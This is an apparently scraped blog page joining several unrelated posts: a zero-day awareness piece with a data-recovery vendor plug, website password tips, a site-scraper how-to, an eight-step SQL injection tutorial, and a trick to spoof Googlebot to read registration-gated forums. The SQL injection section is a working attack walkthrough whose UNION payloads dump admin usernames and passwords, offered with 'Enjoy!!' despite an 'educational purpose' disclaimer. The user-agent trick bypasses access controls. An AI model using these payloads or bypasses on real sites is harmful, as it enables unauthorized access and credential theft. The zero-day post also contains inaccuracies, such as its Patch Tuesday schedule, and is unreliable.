Zero-Day Attacks- How Safe Are You?

This is a guest post by Meenakshi Nagri.

In the past couple of years, there has been a rise in cyber-attacks which has eventually pushed for more reliable and better security capabilities such as protection, code security, encryption, authorization, so on and so forth. Moreover, it is imperative to protect global business and critical infrastructure from such cyber-attacks.

An average user or even a web-savvy user has a little knowledge about which application has better security standards. It is imperative to evaluate the safety of applications. There are some security protocols which should be maintained without deviating from the end goal.

Both organisations and individuals should strive to meet all the necessary security protocols and most importantly evaluate and meet all the security requirements and be assured that they meet the baseline for data security.

Vulnerability Timeline

A study reveals that about 20% of the global organisations rank cyber espionage as the most pressing concern, therefore, making it a significant threat to their business. The number of zero days is continually rising and with each attack being more severe. The primary targets under the radar have been government institutions, organisations from various sectors, individuals and so on.

The basic fundamental of cyber espionage is to expose the private information of the concerned person or company. Cyber espionage tops the list of security concerns as it repercussions can be felt even after eliminating the threat as it damages trade and creates a dent in the global economy.

Ransomware, malware attack, phishing, etc. are some common cyber-attacks. In particular, as recent has been the case with WannaCry ransomware attack. It was reported that it had infected more than 230,000 computers worldwide. Many organisations were hit in over 150 countries. The common tactic is to take advantage of the gaps left in the networks that have businesses partnerships and government agencies. Simply put, through these networks, these entities share valuable information that hackers can penetrate into thus easily getting access to useful information.

The question that arises next is why these entities get affected by cyber-attacks? The reason being, the lack of proper security implementation of protocols. Organizations, enterprises, individuals need to be informed of cyber-attack activities, so they better recognize the risk of exposure before it is unsolicited exposed.

Threats are Constantly Evolving

While recently catching up with news, you may have heard terms like ‘zero day’ and ‘cyber conflict’ over and over again. The technology has bestowed us with new exciting security protocols. This implies that with each advancement, we are better at adding an extra layer of security; however, as these approaches become obsolete, they can be bypassed quickly thus leaving a void for the cyber-attacks.

A zero-day vulnerability refers to such voids left in software which is unknown to the developers. This flaw is then exploited by the attackers with malicious intent even before the developers become aware of it. To counter the vulnerabilities, a software patch is released to fix the issue. Once such example is of Microsoft’s Patch Tuesday i.e. Microsoft releases security patches on every second or fourth Tuesday of each month for its products.

One of the reasons of the cyber espionage is the lack of applying these tactics i.e. to update their system with recently security updates. Systems running under unsupported operating systems or older versions were substantially exposed.

Simply put, developers create software that contains some voids and attackers spot the vulnerability before developers can act and exploits it. Once the patches are released, the exploits are no longer a threat.

The Role of Security Standard

As attackers look for advanced ways to exploit the vulnerabilities, new procedures and techniques are being adopted by them. They use hacking methods such as watering hole attacks, spear phishing attack, Whaling, Port scanning, to name a few.

Cyber security is a bigger challenge as one needs to implement advanced protocols and meet safety standards when required. Even though organizations may fulfill all the criteria or the developers checklist everything on the standards of security, there’s always room for enhancing the basic security capabilities. The fast evolving tactics and unpredictable threats used by cyber criminals have pushed for advanced evaluation and monitoring of services.

As the attackers adopt the latest technology, the security community is pushing for other defensive stances as well. They have started putting steps in place to guard against cyber- attack. Struggling to keep up with the security standards means to put the critical information and infrastructure at risk.

Adopting techniques to protect the cyber environment is the need of the hour. The primary objective is to mitigate and prevent any potential for cyber-attacks and for that, more and more companies are implementing various security safeguards, risk management approaches, guidelines, policies, technologies, investing in data recovery services, so on and so forth.

A Helping Hand

Zero-day, cyber conflict and cyber espionage all are a broader picture of cyber-attack, and nonetheless, make up for most of the cyber security challenge. The users need not be security experts to protect themselves against the attacks.

1. Use a top antivirus that will ensure that you are protected against both known & unknown vulnerability.
2. Time again IT experts ask users to update their software’s, the Update may include protection from a recently discovered bug.
3. Upgrade the browsers, push out an automatic update of the browsers regularly.

Stellar Data Recovery is one such name which is capable of countering such cyber-attacks; thereby, it presents itself as a reliable partner when it comes to data security.

The Final Word

We will always be wooed by the latest technological advancement which also means that the old ones will become obsolete; thereby, adopting new security approaches is equally essential. Cyber-attacks expose valuable assets gaining unauthorized access; therefore, businesses need to defend themselves against it and incorporate security protocols to mitigate the risk.

Simple Yet Effective Security Tips Against Website Hackers

This is a guest post by Chris Miller.

The internet is a very vast place with all kinds of people surfing it. With growing awareness for internet and web based services it is now the responsibility of website owners to protect their websites against any risk or security threat from anyone else. Further, the customer information, such as credit card details and other sensitive personal information etc should be properly protected.

Hack attempts are very common phenomena now and it has been noticed that around 90% of the hackers use the simplest technique for it, i.e. human negligence. However, it is the responsibility of every software development company offering software development services to create secure websites and educate the website owners about various strategies and methods that would help them in securing their website from hack attempts. We are going to offer some very simple yet effective security tips for website owners that will help them in protecting their websites against hackers without applying any advanced security measures.

Create Strong Passwords: While this may sound absurd but it is one of the most targeted area by hackers. They rely on the fact that most of the users are not really aware about the concept of strong passwords. A weak password is usually the weakest link in the chain and hackers try to exploit it. The first thing that you need to do is create a very strong password.

Some of the passwords and password making techniques that should never be used are:

• Never use the name of your website or the domain name as the admin password.
• Predictable and simplest combinations such as admin123, abc123, QWERTY etc should be strongly avoided as hackers are definitely going to try them as the first thing.
• The username and the password should never be similar or have slight variations. This may sound foolish but many users keep their username and passwords same or very similar. For example, admin/admin123, George/george11 etc.
• Words such as password, secret, admin, go, start, begin etc are also in hackers top list.
• Also, avoid using words that are from dictionary as there are some programs that would match every word in the dictionary against a user name in order to find a password.

Your passwords should be at-least six characters long with a mixture of upper and lowercase letters combined with numbers and special characters. Further, make sure that you have unique passwords for each login and they are changed at-least once a month.

Do Not Save The Passwords: Avoid saving the passwords when you log into your site. The browsers save the password and hackers target them to fetch any file named saved passwords or similar words. They usually send out a Trojan that scans whole computer software for such files and sends them to the desired location.

Rename Your Admin Folder: Renaming the “admin” folder is another simple yet effective technique to save you website from hackers. Once you change the name of admin folder the hackers won’t even have a clue to reach your admin panel. However, the new name of the folder should not be containing dictionary words or the site name. Further, try to include number and special characters to make the name tougher to guess.

These are some of the simplest tricks to enhance the security of your website without requiring much technical help or expertise. However, website owners should include third party softwares and solutions to make the website secure.

About the author:

Chris Miller is a blogger cum developer @ Xicom Technologies. Xicom a leading CMMI Level-3 Web development company offerings Custom php development offshore web development, web development outsourcing services from a leading offshore web development company.

View & Download Complete Structure Of Any Website Using BlackWidow

Blackwidow software can download complete structure of site & can scan a site without downloading it to your hard drive.

Download it from here.

• Download blackwidow, install it & then open.
• Click on Browser menu, enter the address as abc.com & then press enter. It will browse the url you have entered.
• Now go to Scanner, click to Start Scan.
• After processing, you will see complete structure of site, likely you can also check for link errors, external errors etc.

Hack SQL Vulnerable Websites In 8 Steps (SQL Injection Tutorial)

As you have already gone through basic SQL injection (which is also called as Blind SQL Injection & mostly used by noobs) for hacking sites like using queries in admin & password fields as 1' or '1' = '1 or many like it. Today I will tell about how we can hack SQL vulnerable sites. This tutorial is only for educational purpose, it will show you how to attack on SQL databases of vulnerable sites, follow these steps:

1. Find SQL vulnerable site, for e.g. 
   http://www.example.com/index.php?id=3 (Easy way is to google it using "inurl:")
2. Check whether it's vulnerable or not, enter a ' after the 3 in the url, for e.g.
   http://www.example.com/index.php?id=3'
   
   
   Note: If page gives error, means you can continue, site is vulnerable. But if page loads without error, then website is not vulnerable.
3. Now find the number of columns in the database using "order by", for e.g.
   http://www.example.com/index.php?id=3 order by 1--
   http://www.example.com/index.php?id=3 order by 2--
   http://www.example.com/index.php?id=3 order by 3--
   http://www.example.com/index.php?id=3 order by 4--
   http://www.example.com/index.php?id=3 order by 5--
   http://www.example.com/index.php?id=3 order by 6--
   
   Note: If you receive error here, means we have 5 columns. If the site give error on "order by 8", then we would have 7 columns.
4. Now find the vulnerable columns in existing 5 columns, for e.g.
   http://www.example.com/index.php?id=3 union all select 1,2,3,4,5--
   
   
   Note: If it executes successfully, then page will show some numbers on the page. For e.g. 2 and 5, means columns 2 and 5 are vulnerable.
5. Find the database version, user & name with commands:
   http://www.example.com/index.php?id=3 union all select 1,user(),3,4,version()--
   http://www.example.com/index.php?id=3 union all select 1,version(),3,4,database()--
   
   Note: If the version is 5 and above, then carry on.
6. Now list all the table names using command after the url:
   union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
   
   
   For e.g. http://www.example.com/index.php?id=3 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
   
   
   Take a glance at some useful tables like admin, user etc. Suppose you get table name admin.
7. Now list all the column names using:
   union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
   
   
   For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
   
   Find some useful columns from it like username, passwd etc.
8. Final step, retrieving the username & password fields from table admin (as mentioned above), use the command:
   union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
   Where admin is the table name.
   
   
   For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--

That's all. Now you have admin username & password. Enjoy!!

Access Forum Based Websites Without Sign Up Process

User visit to forums for finding any information, but sometimes it requires register to view the forums contents. So here’s way to access all information without register to that site, follow these steps:

• Download the User Agent Switcher ad-on  for Firefox from here and install it.
• Now go to Tools> Default User Agent> User Agent Switcher> Options.
• It will display User Agent Switcher Options.
• Select New User Agent and type “crawl-66-249-66-1.googlebot.com” without quotes in Description and in User Agent: type “Googlebot/2.1 (+http://www.googlebot.com/bot.html)” without quotes, leave other fields blank and then OK.
• Now again go to Tools> Default User Agent and select crawl-66-249-66-1.googlebot.com

You have done, browse any forum based website without doing register. If you have a question in your mind about Google Bot then you can know about it from here.

Note: I suggest to enable this Add-on only when you have to access the forums because your browser will show incompatibility with your sites. Disable it when you've no need of it. Hope you will get success in first attempt.